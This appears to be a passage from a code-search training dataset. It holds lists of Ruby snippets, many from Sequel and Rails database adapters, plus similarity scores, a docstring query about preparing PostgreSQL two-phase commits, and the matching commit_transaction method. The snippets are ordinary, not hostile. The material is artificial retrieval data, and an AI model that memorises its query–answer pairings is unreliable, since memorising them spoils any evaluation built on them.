"def format; end",
"def format; end",
"def format; end",
"def format; end",
"def formats\n format\n end",
"def datetime_format\n @default_formatter.datetime_format\n end",
"def set_default_response_format\n request.format = :json unless params[:format]\n end",
"def load_format(format)\n case format.to_s\n when /(md|mkdn?|mdown|markdown)$/i\n :markdown\n when /(textile)$/i\n :textile\n when /(rdoc)$/i\n :rdoc\n when /(org)$/i\n :org\n when /(creole)$/i\n :creole\n when /(re?st(\\.txt)?)$/i\n :rest\n when /(asciidoc)$/i\n :asciidoc\n when /(pod)$/i\n :pod\n when /(\\d)$/i\n :roff\n when /(media)?wiki$/i\n :mediawiki\n else\n nil\n end\n end",
"def default_timestamp_format\n \"{ts '%Y-%m-%d %H:%M:%S%N'}\"\n end",
"def type_to_sql(type, limit = nil, precision = nil, scale = nil)\n if type == :decimal\n # Force an explicit scale if none supplied to specify the fixed\n # point form of Virtuoso's DECIMAL type. If no scale is specified,\n # the Virtuoso DECIMAL type stores floating point values.\n precision ||= 32\n scale ||= 0\n end\n super(type, limit, precision, scale)\n end",
"def format(name=nil)\n @format = name.to_s if name\n @format || DEFAULT_FORMAT\n end",
"def format\n raise '#format must be implemented in child class'\n end",
"def datetime_format=(datetime_format)\n @default_formatter.datetime_format = datetime_format\n end",
"def format\n @data.format == :base ? :file : @data.format\n end",
"def to_postgres_string\n min_string = minutes.to_s\n sec_string = seconds.to_s\n \n min_string = \"0\" + min_string if minutes.to_s.length < 2\n sec_string = \"0\" + sec_string if seconds.to_s.length < 2\n \n return hours.to_s+\":\"+min_string+\":\"+sec_string\n end",
"def is_format?(); @type == GRT_FORMAT; end",
"def use_column_schema_to_ruby_default_fallback?\n database_type != :mysql\n end",
"def use_column_schema_to_ruby_default_fallback?\n database_type != :mysql\n end",
"def firebird_cast_default\n sql = \"SELECT CAST(#{@default} AS #{column_def}) FROM RDB$DATABASE\"\n if connection = Base.active_connections.values.detect { |conn| conn && conn.adapter_name == 'Firebird' }\n connection.execute(sql).to_a.first['CAST']\n else\n raise ConnectionNotEstablished, \"No Firebird connections established.\"\n end\n end",
"def format=(format)\n use_format(format)\n end",
"def psql_db_dump_replacer__for_psql_db__sample_example\n [\n psql_db__sample_example,\n [\n \"/tmp/psql_db_original_dump\"\n ],\n [\n \"/tmp/database_dump\"\n ],\n \"ON_ERROR_STOP=off\",\n ]\n end",
"def datetime_format\n end",
"def connection_configuration_sqls\n sqls = super\n sqls << \"SET DateStyle = 'ISO'\" if @use_iso_date_format\n sqls\n end",
"def default_key_format(key)\n key\n end",
"def set_wiki_format_for_preview\n @text.wiki_format = params[:pwfmt_format] if @text && params[:pwfmt_format]\n end",
"def set_wiki_format_for_preview\n @text.wiki_format = params[:pwfmt_format] if @text && params[:pwfmt_format]\n end",
"def create_format_method\n end",
"def set_default_format\n request.format = 'json'\n end",
"def set_default_format\n request.format = 'json'\n end",
"def convert_format(value, definition)\n value || 'html'\n end",
"def typus_date_format(attribute = 'default')\n date_format = Typus::Configuration.config[self.name]['fields']['options']['date_formats'][attribute] rescue nil\n date_format = :db if date_format.nil?\n return date_format.to_sym\n end",
"def cast_default(value)\n @format_string = iso8601\n cast_fmt(value)\n end",
"def format=(_arg0); end",
"def format=(_arg0); end",
"def format=(_arg0); end",
"def format=(_arg0); end",
"def default_format_to_atom\n # Default the type we are sending out\n if request.accept.nil?\n request.format = :atom\n end\n end",
"def default_format_to_atom\n # Default the type we are sending out\n if request.accept.nil?\n request.format = :atom\n end\n end",
"def record_format\n @record_format ||= make_record_description if record_describer\n end",
"def format\n @format ||= properties.format.new self\n end",
"def format= new_format\n @grpc.type = :PLAIN_TEXT if new_format.to_s == \"text\"\n @grpc.type = :HTML if new_format.to_s == \"html\"\n @grpc.type\n end",
"def default_formatter\n Sapience::Formatters::Default.new\n end",
"def datetime_format\n @default_formatter.datetime_format\n end",
"def guess_date_format\n begin\n line = @data.gets\n break if line.nil?\n\n date = line[1..-1]\n guessed_format = Qif::DateFormat::SUPPORTED_DATEFORMAT.find { |format_string, format|\n test_date_with_format?(date, format_string, format)\n }\n end until guessed_format\n\n @data.rewind\n\n guessed_format ? guessed_format.first : @fallback_format\n end",
"def format=(procedure); end",
"def preformatting\n\n end"
] |
[
"0.62009215",
"0.5986719",
"0.5925541",
"0.5899727",
"0.58987576",
"0.58987576",
"0.5891657",
"0.58241314",
"0.57326424",
"0.5712006",
"0.5712006",
"0.5691154",
"0.5628859",
"0.5605188",
"0.5576969",
"0.5564784",
"0.55390805",
"0.5512747",
"0.55099905",
"0.55004245",
"0.54813516",
"0.54565156",
"0.54542017",
"0.54407746",
"0.54129773",
"0.53869724",
"0.5385871",
"0.5377548",
"0.53703064",
"0.5335459",
"0.53244156",
"0.53153217",
"0.53018886",
"0.52643555",
"0.523289",
"0.52239436",
"0.5221858",
"0.5220793",
"0.5219631",
"0.5205655",
"0.5184887",
"0.51814324",
"0.5176165",
"0.51726055",
"0.51680243",
"0.5160576",
"0.51540303",
"0.51535314",
"0.5149291",
"0.51313406",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.51154757",
"0.5113992",
"0.5104564",
"0.51034623",
"0.509926",
"0.5097371",
"0.50870836",
"0.50826484",
"0.5076271",
"0.50744104",
"0.506893",
"0.5065279",
"0.50572985",
"0.50572985",
"0.5055672",
"0.5032734",
"0.5031876",
"0.502883",
"0.5027",
"0.5013925",
"0.5011036",
"0.5011036",
"0.50103974",
"0.4993597",
"0.49934736",
"0.49911702",
"0.49790943",
"0.49772224",
"0.49675253",
"0.49675253",
"0.49675253",
"0.49675253",
"0.4964867",
"0.4964867",
"0.49639493",
"0.49629107",
"0.49480483",
"0.49439335",
"0.49393898",
"0.4938375",
"0.49342814",
"0.49305558"
] |
0.5733273
|
8
|
If the :prepare option is given and we aren't in a savepoint, prepare the transaction for a twophase commit.
|
def commit_transaction(conn, opts=OPTS)
if (s = opts[:prepare]) && savepoint_level(conn) <= 1
log_connection_execute(conn, "PREPARE TRANSACTION #{literal(s)}")
else
super
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def on_prepare_transaction_commit(unit, transaction); end",
"def commit_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n if supports_releasing_savepoints?\n log_connection_yield('Transaction.release_savepoint', conn){conn.release_savepoint(savepoint_obj(conn))}\n end\n else\n log_connection_yield('Transaction.commit', conn){conn.commit}\n end\n end",
"def on_prepare_commit(unit, aggregates, events); end",
"def prepare_save!\n run_callbacks(:save) { false }\n end",
"def begin_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n _trans(conn)[:savepoints][-1][:obj] = log_connection_yield('Transaction.savepoint', conn){conn.set_savepoint}\n else\n log_connection_yield('Transaction.begin', conn){conn.setAutoCommit(false)}\n set_transaction_isolation(conn, opts)\n end\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def commit( defer=false )\n save_logic( defer, false )\n end",
"def commit_required?; end",
"def supports_savepoints_in_prepared_transactions?\n supports_prepared_transactions? && supports_savepoints?\n end",
"def prepare(&block)\n @prepare = block\n end",
"def prepare!; end",
"def prepare!; end",
"def prepare(*)\n raise Error, \"cannot prepare an already prepared statement\" unless allow_preparing_prepared_statements?\n super\n end",
"def transaction(&block)\n yield\n commit\n end",
"def run(*args, &block)\n Sequel::Model.db.transaction(rollback: :always, auto_savepoint: true) { super }\n end",
"def commit!\n _commit( false )\n end",
"def prepare; end",
"def prepare; end",
"def prepare; end",
"def supports_prepared_transactions?\n false\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def prepare\n @prepare ||= default_prepare\n end",
"def commit_transaction\n\t super\n\n\t arguments.dup.each do |key, value|\n if value.respond_to?(:transaction_proxy?) && value.transaction_proxy?\n\t\t arguments.update!(key, value.__getobj__)\n\t\tend\n\t end\n\tend",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def commit; end",
"def commit; end",
"def commit; end",
"def prepare(&block)\n define_method(:prepare, &block)\n end",
"def prepare(options = {})\n raise \"prepare not implemented\"\n end",
"def prepare\n true\n end",
"def prepare\n true\n end",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def notify_prepare_commit\n raise NotImplementedError\n end",
"def prepare record = nil, command\n record ? Statement.new(record, command) : db.prepare(command)\n end",
"def camCommitPrepared _obj, _args\n \"_obj camCommitPrepared _args;\" \n end",
"def commit_transaction\n # The relation graph handling is a bit tricky. We resolve the graphs\n # exclusively using self (NOT other) because if 'other' was a new\n # task, it has been already moved to the new plan (and its relation\n # graph resolution is using the new plan's new graphs already)\n\n super\n\n if @executable != __getobj__.instance_variable_get(:@executable)\n __getobj__.executable = @executable\n end\n\n finalization_handlers.each do |handler|\n __getobj__.when_finalized(handler.as_options, &handler.block)\n end\n end",
"def commit=(_arg0); end",
"def commit=(_arg0); end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def commit!() raise NotImplementedError end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare()\n end",
"def after_commit(unit); end",
"def commit_if_dirty\n # no op\n end",
"def after_commit(*); end",
"def commiter() end",
"def allow_preparing_prepared_statements?\n false\n end",
"def prepare\n end",
"def commit()\n check_return_code(PureHailDB.ib_trx_commit(@trx_ptr))\n end",
"def commit()\n #This is a stub, used for indexing\n end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def commit_transaction\n\t super\n\t \n\t # Update the task arguments. The original\n\t # Roby::Task#commit_transaction has already translated the proxy\n\t # objects into real objects\n\t arguments.each do |key, value|\n\t\t__getobj__.arguments.update!(key, value)\n\t end\n\n execute_handlers.each do |h|\n __getobj__.execute(h.as_options, &h.block)\n end\n poll_handlers.each do |h|\n __getobj__.poll(h.as_options, &h.block)\n end\n\n __getobj__.abstract = self.abstract?\n if @fullfilled_model\n __getobj__.fullfilled_model = @fullfilled_model.dup\n end\n __getobj__.do_not_reuse if !@reusable\n\tend",
"def TransactionBegin()\n\t@dbh.do(\"BEGIN\")\nend",
"def prepare!\n prepare_in_parallel!\n end",
"def commit_transaction(conn, opts={})\n log_yield(TRANSACTION_COMMIT){conn.commit}\n end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def prepare; self; end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def prepare_invoke!\n @prepared = true\n end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
"def run_prepare_code\n @context = @prepare_code ? @prepare_code[] : nil\n @prepared = true\n @context\n end",
"def after_commit(&blk)\n ActiveRecord::Base.connection.add_transaction_record(\n AfterCommitWrapper.new(&blk)\n )\n end",
"def commit!\n save! unless persisted?\n end",
"def prepare\n end",
"def prepare\n end",
"def commit( transaction )\n fail NotImplementedError\n end",
"def within_transaction\n if use_transaction\n first.within_transaction do\n yield\n success?\n end\n else\n yield\n end\n end",
"def rollback_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n log_connection_yield('Transaction.rollback_savepoint', conn){conn.rollback(savepoint_obj(conn))}\n else\n log_connection_yield('Transaction.rollback', conn){conn.rollback}\n end\n end",
"def transaction(&block); end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def within_transaction; end",
"def within_transaction; end",
"def commit(on_kill = false)\n\n unless @destination.sql.empty?\n\n $log.debug(self) {'Launch last commit'} if on_kill\n\n if @use_cache\n cache_time = Time.now\n\n # And add to the cache\n @cache.commit\n\n Thread.current[:threshold_log].add 'Cache time', (Time.now - cache_time).round(3)\n end\n\n pg_time = Time.now\n # Launch SQL commands\n @destination.commit\n Thread.current[:threshold_log].add 'Replicate time', (Time.now - pg_time).round(3)\n\n end\n\n end",
"def remove_transaction(conn, committed)\n if jdbc_level = _trans(conn)[:original_jdbc_isolation_level]\n log_connection_yield(\"Transaction.restore_isolation_level\", conn){conn.setTransactionIsolation(jdbc_level)}\n end\n unless in_savepoint?(conn)\n conn.setAutoCommit(true)\n end\n ensure\n super\n end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def commit_transaction(tx)\n tx.execute\n end",
"def prepare\n # Only do this once\n return if $has_prepared\n\n prepared_statements = {\n temperature_readings: :insert_temp,\n moisture_readings: :insert_moisture,\n light_readings: :insert_light,\n }\n\n prepared_statements.each do |table, name|\n DB[table].prepare(:insert, name, plant_id: :$plant_id, value: :$value)\n end\n\n $has_prepared = true\nend",
"def commit\n # no op\n end",
"def transaction(&blk)\n tap(&blk)\n end",
"def commit_transaction(conn)\n log_connection_execute(conn, commit_transaction_sql) unless Thread.current[:sequel_transaction_depth] > 1\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def _save(opts)\n sh = {:server=>this_server}\n uacr = use_after_commit_rollback\n if uacr.nil? ? (method(:after_rollback).owner != InstanceMethods) : uacr\n Sequel::Deprecation.deprecate(\"Model#after_rollback\", \"Instead, call db.after_rollback in Model#before_save\")\n db.after_rollback(sh){after_rollback}\n end\n pk = nil\n called_save = false\n called_cu = false\n around_save do\n called_save = true\n if before_save == false\n Sequel::Deprecation.deprecate(\"Having before_save return false to cancel the save\", \"Instead, call cancel_action inside before_save\")\n raise_hook_failure(:before_save)\n end\n\n if new?\n around_create do\n called_cu = true\n if before_create == false\n Sequel::Deprecation.deprecate(\"Having before_create return false to cancel the create\", \"Instead, call cancel_action inside before_create\")\n raise_hook_failure(:before_create)\n end\n pk = _insert\n _after_create(pk) # SEQUEL5: Remove\n # SEQUEL5\n # @this = nil\n # @new = false\n # @modified = false\n # pk ? _save_refresh : changed_columns.clear\n after_create\n true\n end\n raise_hook_failure(:around_create) unless called_cu\n else\n around_update do\n called_cu = true\n if before_update == false\n Sequel::Deprecation.deprecate(\"Having before_update return false to cancel the update\", \"Instead, call cancel_action inside before_update\")\n raise_hook_failure(:before_update)\n end\n columns = opts[:columns]\n if columns.nil?\n columns_updated = if opts[:changed] # SEQUEL5: Use local variable instead of instance variable\n @values.reject{|k,v| !changed_columns.include?(k)}\n else\n _save_update_all_columns_hash\n end\n changed_columns.clear\n else # update only the specified columns\n columns = Array(columns)\n columns_updated = @values.reject{|k, v| !columns.include?(k)}\n changed_columns.reject!{|c| columns.include?(c)}\n end\n _update_columns(columns_updated)\n _after_update # SEQUEL5: Remove\n # SEQUEL5\n # @this = nil\n # @modified = false\n after_update\n true\n end\n raise_hook_failure(:around_update) unless called_cu\n end\n after_save\n true\n end\n raise_hook_failure(:around_save) unless called_save\n _after_save(pk) # SEQUEL5: Remove\n if uacr.nil? ? (method(:after_commit).owner != InstanceMethods) : uacr\n Sequel::Deprecation.deprecate(\"Model#after_commit\", \"Instead, call db.after_commit in Model#after_save\")\n db.after_commit(sh){after_commit}\n end\n self\n end",
"def test_commit_empty()\n t = Scalaroid::Transaction.new()\n t.commit()\n t.close_connection()\n end"
] |
[
"0.6718019",
"0.662396",
"0.6306131",
"0.6208742",
"0.61423445",
"0.6091793",
"0.6091793",
"0.6078697",
"0.6044119",
"0.59700394",
"0.5848423",
"0.58226323",
"0.58226323",
"0.57957965",
"0.5729422",
"0.56911594",
"0.56845605",
"0.56661",
"0.56661",
"0.56661",
"0.5664158",
"0.5662792",
"0.5662792",
"0.5662128",
"0.5651784",
"0.5620142",
"0.5620142",
"0.5613401",
"0.5613401",
"0.5613401",
"0.56055105",
"0.55733514",
"0.5538407",
"0.5538407",
"0.55249447",
"0.55184317",
"0.5510675",
"0.5510236",
"0.5509445",
"0.55055636",
"0.55055636",
"0.5497655",
"0.5497655",
"0.5495107",
"0.54837376",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.54523724",
"0.54512423",
"0.54432625",
"0.5440707",
"0.54289365",
"0.5428602",
"0.5418754",
"0.5408349",
"0.540452",
"0.5395334",
"0.539266",
"0.53787106",
"0.5356356",
"0.53543323",
"0.5327595",
"0.53190255",
"0.5318492",
"0.5318492",
"0.5312136",
"0.5307578",
"0.5307578",
"0.5295135",
"0.52950835",
"0.5292285",
"0.529208",
"0.529208",
"0.52706444",
"0.52701676",
"0.52679074",
"0.52626485",
"0.5261709",
"0.5261709",
"0.5261709",
"0.5258163",
"0.5258163",
"0.5252249",
"0.5239655",
"0.52353674",
"0.52330816",
"0.52330816",
"0.5230019",
"0.5226595",
"0.52258253",
"0.52145934",
"0.52067417",
"0.52060133",
"0.520013",
"0.51986897"
] |
0.71222514
|
0
|
PostgreSQL can't combine rename_column operations, and it can combine the custom validate_constraint operation.
|
def combinable_alter_table_op?(op)
(super || op[:op] == :validate_constraint) && op[:op] != :rename_column
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def undo_cleanup_concurrent_column_rename(table, old_column, new_column, type: nil, batch_column_name: :id)\n Gitlab::Database::QueryAnalyzers::RestrictAllowedSchemas.require_ddl_mode!\n\n setup_renamed_column(__callee__, table, new_column, old_column, type, batch_column_name)\n\n with_lock_retries do\n install_bidirectional_triggers(table, old_column, new_column)\n end\n end",
"def rename_column_concurrently(table, old_column, new_column, type: nil, batch_column_name: :id)\n Gitlab::Database::QueryAnalyzers::RestrictAllowedSchemas.require_ddl_mode!\n\n setup_renamed_column(__callee__, table, old_column, new_column, type, batch_column_name)\n\n with_lock_retries do\n install_bidirectional_triggers(table, old_column, new_column)\n end\n end",
"def supports_named_column_constraints?\n true\n end",
"def validate_constraint(name)\n @operations << {:op => :validate_constraint, :name => name}\n end",
"def rename?\n model.send(:\"rename_#{column}\")\n end",
"def rename_column(table_name, old_name, new_name)\n column_functional(table_name) do\n rename_table_column(old_name, new_name)\n end\n end",
"def cleanup_concurrent_column_rename(table, old_column, new_column)\n teardown_rename_mechanism(table, old_column, new_column, column_to_remove: old_column)\n end",
"def rename_rule(old_name, table, new_name)\n execute \"ALTER RULE #{quote_rule(old_name)} ON #{quote_table_name(table)} RENAME TO #{quote_rule(new_name)};\"\n end",
"def rename_column(old_col_name, new_col_name)\r\n raise \"Do not execute this method in client/server mode!\" if \\\r\n @db.client?\r\n\r\n raise \"Cannot rename recno column!\" if old_col_name == :recno\r\n raise \"Cannot give column name of recno!\" if new_col_name == :recno\r\n\r\n raise 'Invalid column name to rename: ' % old_col_name unless \\\r\n @field_names.include?(old_col_name)\r\n \r\n raise 'New column name already exists: ' % new_col_name if \\\r\n @field_names.include?(new_col_name)\r\n\r\n @db.engine.rename_column(self, old_col_name, new_col_name)\r\n\r\n # Need to reinitialize the table instance and associated indexes.\r\n @db.engine.remove_recno_index(@name)\r\n @db.engine.remove_indexes(@name)\r\n\r\n update_header_vars\r\n create_indexes\r\n create_table_class unless @db.server?\r\n end",
"def rename!(new_name, orig_name)\n new_name = new_name.to_underscore_sym\n orig_name = orig_name.to_underscore_sym\n raise ArgumentError, \"Column not found\" unless self.labels.include?(orig_name)\n raise ArgumentError, \"Cannot name #{orig_name} to #{new_name}, that column already exists.\" if self.labels.include?(new_name)\n i = self.labels.index(orig_name)\n self.labels[i] = new_name\n end",
"def test_add_rename\n add_column \"test_models\", \"girlfriend\", :string\n TestModel.reset_column_information\n\n TestModel.create girlfriend: \"bobette\"\n\n rename_column \"test_models\", \"girlfriend\", \"exgirlfriend\"\n\n TestModel.reset_column_information\n bob = TestModel.first\n\n assert_equal \"bobette\", bob.exgirlfriend\n end",
"def supports_external_drop_constraints?() false; end",
"def supports_external_drop_constraints?() true; end",
"def undo_rename_column_concurrently(table, old_column, new_column)\n teardown_rename_mechanism(table, old_column, new_column, column_to_remove: new_column)\n end",
"def check_column_conflicts\n mod = Sequel::Model\n columns.find_all{|c| mod.method_defined?(c)}.each{|c| get_column_conflict!(c)}\n columns.find_all{|c| mod.method_defined?(\"#{c}=\")}.each{|c| set_column_conflict!(c)}\n end",
"def test_rename_column\n add_column \"test_models\", \"first_name\", \"string\"\n\n TestModel.create first_name: \"foo\"\n\n rename_column \"test_models\", \"first_name\", \"nick_name\"\n TestModel.reset_column_information\n assert_includes TestModel.column_names, \"nick_name\"\n assert_equal [\"foo\"], TestModel.all.map(&:nick_name)\n end",
"def rename(renames)\n prepare_atomic_operation do |ops|\n process_atomic_operations(renames) do |old_field, new_field|\n new_name = new_field.to_s\n if executing_atomically?\n process_attribute new_name, attributes[old_field]\n process_attribute old_field, nil\n else\n attributes[new_name] = attributes.delete(old_field)\n end\n ops[atomic_attribute_name(old_field)] = atomic_attribute_name(new_name)\n end\n { \"$rename\" => ops }\n end\n end",
"def test_rename_column_using_symbol_arguments\n add_column :test_models, :first_name, :string\n\n TestModel.create first_name: \"foo\"\n\n rename_column :test_models, :first_name, :nick_name\n TestModel.reset_column_information\n assert_includes TestModel.column_names, \"nick_name\"\n assert_equal [\"foo\"], TestModel.all.map(&:nick_name)\n end",
"def remove_null_constraint_safely(table_name, column_name, name: nil)\n # could also ensure in transaction so it can be reversed\n # but that's more of a concern for a reversible migrations check\n ensure_postgresql(__method__)\n\n reversible do |dir|\n dir.up do\n name ||= null_constraint_name(table_name, column_name)\n\n safety_assured do\n execute quote_identifiers(\"ALTER TABLE %s DROP CONSTRAINT %s\", [table_name, name])\n end\n end\n\n dir.down do\n add_null_constraint_safely(table_name, column_name)\n end\n end\n end",
"def test_remove_index_when_name_and_wrong_column_name_specified\n index_name = \"accounts_idx\"\n\n @connection.add_index :accounts, :firm_id, name: index_name\n assert_raises ArgumentError do\n @connection.remove_index :accounts, name: index_name, column: :wrong_column_name\n end\n ensure\n @connection.remove_index(:accounts, name: index_name)\n end",
"def test_remove_index_when_name_and_wrong_column_name_specified\n index_name = \"accounts_idx\"\n\n @connection.add_index :accounts, :firm_id, name: index_name\n assert_raises ArgumentError do\n @connection.remove_index :accounts, name: index_name, column: :wrong_column_name\n end\n ensure\n @connection.remove_index(:accounts, name: index_name)\n end",
"def validate\n super\n rescue Sudoku::Constraint::ConstraintError => e\n raise ConstraintError, e.message + \" in a column\"\n end",
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def alter_table_sql(table, op)\n case op[:op]\n when :rename_column\n unless sch = op[:schema]\n raise(Error, \"can't find existing schema entry for #{op[:name]}\") unless sch = op[:schema] || schema(table).find{|c| c.first == op[:name]}\n sch = sch.last\n end\n [\n alter_table_sql(table, :op=>:add_column, :name=>op[:new_name], :default=>sch[:ruby_default], :type=>sch[:db_type], :null=>sch[:allow_null]),\n from(table).update_sql(op[:new_name]=>op[:name]),\n alter_table_sql(table, :op=>:drop_column, :name=>op[:name])\n ]\n when :set_column_null, :set_column_default\n raise(Error, \"can't find existing schema entry for #{op[:name]}\") unless sch = op[:schema] || schema(table).find{|c| c.first == op[:name]}\n sch = sch.last\n\n sch = if op[:op] == :set_column_null\n sch.merge(:allow_null=>op[:null])\n else\n sch.merge(:ruby_default=>op[:default])\n end\n\n [\n alter_table_sql(table, :op=>:rename_column, :name=>op[:name], :new_name=>:sequel_access_backup_column, :schema=>sch),\n alter_table_sql(table, :op=>:rename_column, :new_name=>op[:name], :name=>:sequel_access_backup_column, :schema=>sch)\n ]\n else\n super\n end\n end",
"def test_remove_index_when_name_and_wrong_column_name_specified_positional_argument\n index_name = \"accounts_idx\"\n\n @connection.add_index :accounts, :firm_id, name: index_name\n assert_raises ArgumentError do\n @connection.remove_index :accounts, :wrong_column_name, name: index_name\n end\n ensure\n @connection.remove_index(:accounts, name: index_name)\n end",
"def rename_column(table, *args)\n alter_table(table) {rename_column(*args)}\n end",
"def rename_column(table, *args)\n alter_table(table) {rename_column(*args)}\n end",
"def check_constraints\n case self.recordable\n when ExtractionsExtractionFormsProjectsSectionsQuestionRowColumnField\n case self.recordable.question_row_column_field.question_row_column.question_row_column_type.name\n when 'text'\n min_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_length).to_i\n max_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_length).to_i\n if self.persisted? && self.name.length > 0 && (self.name.length < min_length || self.name.length > max_length)\n errors.add(:length, \"must be between #{ min_length.to_s } and #{ max_length.to_s }\")\n end\n when 'numeric'\n # First check that we aren't trying to validate any of the ~, <, >, ≤, ≥ special characters.\n if self.recordable.question_row_column_field.question_row_column.question_row_column_fields.second == self.recordable.question_row_column_field\n unless (self.name =~ /\\A[-+]?[0-9]*\\.?[0-9]+\\z/) || self.name != ''\n errors.add(:value, 'Must be numeric')\n end\n\n min_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_value).to_i\n max_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_value).to_i\n if self.persisted? && (self.name.to_i < min_value || self.name.to_i > max_value)\n errors.add(:value, \"must be numeric and between #{ min_value.to_s } and #{ max_value.to_s }\")\n end\n end\n end\n end\n end",
"def validate_table_column(table, column_name, allowed)\n validate_table(table)\n validate_name(column_name, allowed)\n end",
"def rename(new_name)\n raise 'to be implemented in subclass'\n end",
"def add_alphanumeric_name_constraint(table, column = :name)\n sql = <<-SQL\n ALTER TABLE %s ADD CONSTRAINT constraint_name_alphanumeric\n CHECK (%s SIMILAR TO '\\\\w+[\\\\w-]*(\\\\.[\\\\w-]+)*');\n SQL\n\n run sql % [table.to_s, column.to_s]\n end",
"def should_be_wrong_duplicated_name(wrong_song = @wrong_song)\n validate_column_errors(wrong_song, :name, false, 'activerecord.errors.messages.taken')\n end",
"def should_be_wrong_duplicated_name(wrong_album = @wrong_album)\n validate_column_errors(wrong_album, :name, false, 'activerecord.errors.messages.taken')\n end",
"def should_be_wrong_duplicated_name(wrong_artist = @wrong_artist)\n validate_column_errors(wrong_artist, :name, false, 'activerecord.errors.messages.taken')\n end",
"def change_column_required(col_name, required)\r\n raise \"Do not execute this method in client/server mode!\" if \\\r\n @db.client?\r\n\r\n raise \":recno is always required!\" if col_name == :recno\r\n\r\n raise 'Invalid column name: ' % col_name unless \\\r\n @field_names.include?(col_name)\r\n \r\n raise 'Required must be either true or false!' unless \\\r\n [true, false].include?(required)\r\n \r\n @db.engine.change_column_required(self, col_name, required)\r\n \r\n # Need to reinitialize the table instance and associated indexes.\r\n @db.engine.remove_recno_index(@name)\r\n @db.engine.remove_indexes(@name)\r\n\r\n update_header_vars\r\n create_indexes\r\n create_table_class unless @db.server?\r\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def alias_column_method(params)\n logical_name = params[:new]\n original_name = params[:original]\n \n define_method logical_name do\n self.send(original_name)\n end \n \n define_method \"#{logical_name}=\" do |arg|\n self.send(original_name, arg)\n end\n end",
"def supports_external_add_constraints?() false; end",
"def rename(name, new_name)\n @driver.renameRule([name], [new_name])\n end",
"def map_column(old_name, new_name)\n unless @map.include?(old_name)\n raise ActiveRecord::ActiveRecordError, \"column #{old_name} not found, can't be mapped\"\n end\n if new_name.nil?\n @map.delete old_name\n @columns.delete old_name\n else\n @map[old_name] = new_name\n end\n end",
"def map_column(old_name, new_name)\n unless @map.include?(old_name)\n raise ActiveRecord::ActiveRecordError, \"column #{old_name} not found, can't be mapped\"\n end\n if new_name.nil?\n @map.delete old_name\n @columns.delete old_name\n else\n @map[old_name] = new_name\n end\n end",
"def allow_name_change?\n true\n end",
"def rename_column(table_name, column_name, new_column_name)\n execute \"ALTER TABLE #{quote_table_name(table_name)} ALTER #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}\"\n end",
"def rename(file, newname)\n raise \"Sorry... 'AimsCalc rename' isn't implemented yet.\"\nend",
"def rename_column(table_name, column_name, new_column_name)\n execute \"ALTER TABLE #{quote_table_name(table_name)} RENAME COLUMN #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}\"\n end",
"def rename(old_name, new_name); end",
"def rename(old_name, new_name); end",
"def supports_external_add_constraints?() true; end",
